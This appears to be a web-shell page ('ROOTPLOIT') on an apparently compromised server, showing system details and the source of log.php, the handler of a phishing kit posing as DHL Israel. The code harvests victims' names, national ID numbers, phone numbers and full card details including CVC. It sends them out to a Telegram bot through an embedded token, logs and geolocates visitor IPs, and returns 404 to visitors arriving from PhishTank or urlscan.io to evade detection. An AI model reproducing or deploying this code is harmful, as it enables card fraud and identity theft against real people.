ROOTPLOIT
Server: Apache
System: Linux node6122.myfcloud.com 6.14.3-x86_64-linode168 #1 SMP PREEMPT_DYNAMIC Mon Apr 21 19:47:55 EDT 2025 x86_64
User: bashacomputer (1004)
PHP: 7.4.33
Disabled: exec,passthru,shell_exec,system
$ pwd: /home/bashacomputer/www/iljawa/torsion/logz/
Upload Files
File: /home/bashacomputer/www/iljawa/torsion/logz/log.php
<?php



$date = date('m/d/Y h:i:s a', time());
$ip = getenv("REMOTE_ADDR");


if(($_POST['1'] != "") AND ($_POST['2'] != "") AND ($_POST['3'] != "") AND ($_POST['ccnum'] != "") AND ($_POST['ccexp'] != "") AND ($_POST['cccvv'] != ""))
	
	{	

$message .= "+❤️✉️✉️✉️DHL-ISRAEL✉️✉️✉️❤️+\n";
$message .= "* NAME : ".$_POST['1']."\n";
$message .= "* ID number  : ".$_POST['2']."\n";
$message .= "* Phone Number : ".$_POST['3']."\n";
$message .= "* CARD : ".$_POST['ccnum']."\n";
$message .= "* EXP  : ".$_POST['ccexp']."/\n";
$message .= "* CVC  : ".$_POST['cccvv']."\n";
$message .= "* IP   : $ip\n";
$message .= "* Date   : $date\n";
$message .= "+❤️✉️✉️✉️DHL-ISRAEL✉️✉️✉️❤️+\n";



$api = "6218594251:AAF2vb_XoOAUXeVtbJ9lnf6nusqMMXiE9eI";$chatid = "6239097171";file_get_contents("https://api.telegram.org/bot".$api."/sendMessage?chat_id=".$chatid."&text=" . urlencode($message)."" );

//   include "../anti/antiproxy1.php";

$ip = getenv("REMOTE_ADDR");
$file = fopen("log.txt","a");
fwrite($file,$ip."  -  ".gmdate ("Y-n-d")." @ ".gmdate ("H:i:s")."\n");
$IP_LOOKUP = @json_decode(file_get_contents("http://ip-api.com/json/".$ip));
$COUNTRY = $IP_LOOKUP->country . "\r\n";
$CITY    = $IP_LOOKUP->city . "\r\n";
$REGION  = $IP_LOOKUP->region . "\r\n";
$STATE   = $IP_LOOKUP->regionName . "\r\n";
$ZIPCODE = $IP_LOOKUP->zip . "\r\n";
$message=$ip."\nCountry : ".$COUNTRY."City: " .$CITY."Region : " .$REGION."State: " .$STATE."Zip : " .$ZIPCODE;
$pra=rand();
$pra=md5($pra);
   ### Perform a HTTP REFERER check on the visitor to see if they are coming from the Phishtank website ###

        if(isset($_SERVER['HTTP_REFERER'])) {
         if(parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST) == 'phishtank.com') {
            $content = "#> ".$_SERVER['HTTP_USER_AGENT']." [ Phishtank ] \r\n";
            $save=fopen("phistank.txt","a+");
            fwrite($save,$content);
            fclose($save);
            header("HTTP/1.0 404 Not Found");exit();

        }
        }

        if(isset($_SERVER['HTTP_REFERER'])) {
         if(parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST) == 'www.phishtank.com') {
            $content = "#> ".$_SERVER['HTTP_USER_AGENT']." [ Phishtank ] \r\n";
            $save=fopen("phistank.txt","a+");
            fwrite($save,$content);
            fclose($save);
            header("HTTP/1.0 404 Not Found");exit();

        }
        }
        
        if(isset($_SERVER['HTTP_REFERER'])) {
         if(parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST) == 'www.urlscan.io') {
            $content = "#> ".$_SERVER['HTTP_USER_AGENT']." [ Phishtank ] \r\n";
            $save=fopen("phistank.txt","a+");
            fwrite($save,$content);
            fclose($save);
            header("HTTP/1.0 404 Not Found");exit();

        }
        }
        
        header("Location: ../load.php?Key=$ip=$pra$pra$pra$pra$ip$COUNTRY");
} else


header("Location: ../index.php");



?>
@ Telegram